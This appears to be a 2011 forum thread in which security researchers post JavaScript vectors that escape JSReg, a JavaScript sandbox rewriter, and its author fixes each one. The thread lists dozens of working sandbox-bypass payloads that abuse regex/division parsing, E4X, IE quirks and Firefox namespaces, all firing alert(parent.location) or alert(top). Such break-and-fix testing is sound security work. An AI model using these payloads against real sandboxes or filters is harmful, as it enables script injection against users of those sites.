Nicely done :) and fixed
I'm wondering how many versions you have lol. Is this a windmill war or can I win? Maybe server side regexes with lookbehind would be better or a client side parser

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

1.9

[/lo='/];alert(parent.location+'');

Quote

Is this a windmill war or can I win?

You'll never be sure that you have won, even if you say another.

Quote

I'm wondering how many versions you have

If I say "one more", it's much or little?

----------------------
~Veritas~



Edited 1 time(s). Last edit at 03/30/2011 07:33AM by LeverOne.

Ok one last attempt, I completely rewrite regexes into a JSREG function so /a/ becomes JSREG_R('a')

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

1.10

// I hope it's last 1.x

/\\\',"m","/;lo=");alert(parent.location)//";

----------------------
~Veritas~

Me too, damn I don't want to see 2.0 lol you'll make me cry

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

don't worry - group 2.x is a small.

2.1

<>lo="</>;alert(parent.location);""

----------------------
~Veritas~



Edited 1 time(s). Last edit at 03/30/2011 09:10AM by LeverOne.

E4x strikes again. Ugh. Removed all nodes. If anyone know how to disable e4x with js I'd appreciate it if you let me know.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

2.2

<true true="lo\"/>;alert(parent.location);lo="";

----------------------
~Veritas~



Edited 1 time(s). Last edit at 03/30/2011 10:18AM by LeverOne.

LOL you don't miss a trick :) and fixed.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

e4x = /(?:<\w*>.*<\/\w*>|<\w+.+\/>)/ <-- Horrible reg. expression. At least 3 ways to bypass it. Until tomorrow! :)

----------------------
~Veritas~



Edited 1 time(s). Last edit at 03/30/2011 12:26PM by LeverOne.

@LeverOne

Yeah I know :( it was very quick and very dirty lol

Not much better I know:-
e4x = /(?:<\w*>(?:.|[\f\n\r\u000b\u2028\u2029])*<\/\w*>|<\w+(?:.|[\f\n\r\u000b\u2028\u2029])*\/>)/,

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 03/30/2011 12:32PM by Gareth Heyes.

@Gareth <{'_'} {'o'}="\"/>,alert(top)//" E4X is a beast :P

Quote

Yeah I know :( it was very quick and very dirty

Then I will not continue to affect this subject. You need for more time.

a=1;
b=2;
1<a>b</a>;/;


1.11 // the latest 1.x

'/,alert(parent.location),"lo/";

----------------------
~Veritas~

There's no chance I can match e4x without a parser =) I need to find a way to disable it.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

@LeverOne

Thanks! I broke the syntax check, should detect it now

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

1.12 // the latest of the latest

1/
/lo='/,alert(parent.location+'')



My trash vectors is over at this time.

I want to thank

@SW * and @.mario for DPT of JSReg and

@Gareth - for JSReg. :D

* He, btw, forced @Gareth to fix my favorite regexp-bypass in JSReg's revision 118-

//
alert(parent.location)//

----------------------
~Veritas~



Edited 3 time(s). Last edit at 03/31/2011 09:57AM by LeverOne.

@LeverOne

I wanna thank you for being awesome xD shame you were late to the party though :) JSReg is broken in so many places now! :) a huge challenge to fix thanks

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

@LeverOne .. wow you find lots here. :P

@Gareth .. unfortunately I think it will be impossible to fix 100%, and impossible to allow all syntax without a complete parser

@SW

Yeah looks like that way :(

Anyways I've added e4x detection and now jsreg doesn't allow it. Also fixed lever_one's regex vector

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

// sorry, but...

2.3

<È>x='</È>;alert(parent.location+'')

----------------------
~Veritas~



Edited 1 time(s). Last edit at 04/01/2011 01:19PM by LeverOne.

Ugh. Die E4X. Die.

Thanks and fixed

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

2.4.1

<true>lo='</true
>;alert(parent.location+'')

2.4.2

<?true lo='\' ?>;alert(parent.location+'')


1.13

1/ /x='/;alert(parent.location+'');

1/(/x='/);alert(parent.location+'');

0/0/*lo='*/+alert(parent.location+'')


Unfortunately, detecting of regexps still completely vulnerable. @Gareth, please, don't rush with fix!

----------------------
~Veritas~



Edited 8 time(s). Last edit at 04/06/2011 05:00AM by LeverOne.

Ok I'm back with a bloody nose but still standing (just)
I've completely re-factored the rewriter to handle different states. The regex is handled by a small state machine to fix lax browser parsers and stop bad syntax inside regex character classes. I also detect E4X and prevent it from being executed.

I really appreciate all your help thanks! Please break me again :D this time I should be better prepared for the battle

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

1.14

{}/lo='/,alert(parent.location)//'

----------------------
~Veritas~

Whenever I try to use the "in" or "instanceof" operator I get:
ReferenceError: rewriteinInstanceofOperator is not defined

Ok, I'll add these as well. A more comprehensive list than I tweeted:

Bypasses:

_:/\[/+alert(top)/i
{}/\[/+alert(top)/i
typeof/\[/+alert(top)/i
0?0:/\[/+alert(top)/i
delete/\[/+alert(top)/i
void/\[/+alert(top)/i
with({})/\[/+alert(top)/i
if(1)/\[/+alert(top)/i
while(1)/\[/+alert(top)/i -- Careful with this one
try{/\[/+alert(top)/i}catch(a){}
throw/\[/+alert(top)/i
(function(){return/\[/+alert(top)/i})()
do{/\[/+alert(top)/i}while(1)
switch(0){case 0:/\[/+alert(top)/i}

_:/(]\[)/+alert(top)//]

_:/'/+alert(top)/i

_:<{'x'}>'</x>+alert(top)//'

_:/{/;alert(top)//

_:/\(/;alert(top)//

_:/ /+alert(top)//

Endless loops:

_:/\[/

_:/'/

_:/(]\[)/

_:/ / /**/


The common problem in all these cases is that the first / is interpreted as division instead of regexp. The prefixes are incorrectly interpreted as the first operand of the division.

Overall there has been fantastic improvement on the regexps (as long as they are identified as such)! Great work Gaz!

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)



Edited 3 time(s). Last edit at 04/29/2011 11:18AM by Jonas Magazinius.

Awesome thanks!

Took slightly longer to fix because lever_one pointed out that I need to track statements with his vector. Jonas I forgot to add the left flag for statements for your bugs =) oooops fixed

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

1.15 // opened another problem

+{}/ /lo="/,alert(parent.location)//"

1.16 // IE6-8, IE9 (IE7-8 compat. mode)

/[]/,'lo]/,alert(parent.location)//'

/[^]/,'lo]/,alert(parent.location)//'

----------------------
~Veritas~



Edited 1 time(s). Last edit at 04/29/2011 05:53PM by LeverOne.

@Lever_One

Those IE ones are outstanding! :D that isn't even a bug in JSReg :) IE is doing crazy things there. For the first one I need to track { and } to determine if it's a block statement or object literal.

Update....
and fixed! I check for empty character classes and track opening and closing curlys to determine a block statement or object literal.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 05/01/2011 07:29PM by Gareth Heyes.

JSReg is starting to get tight! But FF namespaces and magic strings comes to the rescue..

$='@mozilla.org/js/function';
$::['alert']($::['top']);

$='';[].$::['sort']

And here's a surprising problem:

(function(){this['alert'](this['top'])})()

The same rewriting problem exist with null[''], but is afaik not exploitable.


And we can put it all together:

var _=(function(){return this})()
$='';
_.$::['alert'](_.$::['top'])


I'm still annoyed about the typo "rewriteinInstanceofOperator".

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Some more problems of the "old" kind:


true/'/'+alert(top)+''
this/'/'+alert(top)+''
undefined/'/'+alert(top)+''
null/'/'+alert(top)+''
false/'/'+alert(top)+''
Infinity/'/'+alert(top)+''
NaN/'/'+alert(top)+''

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)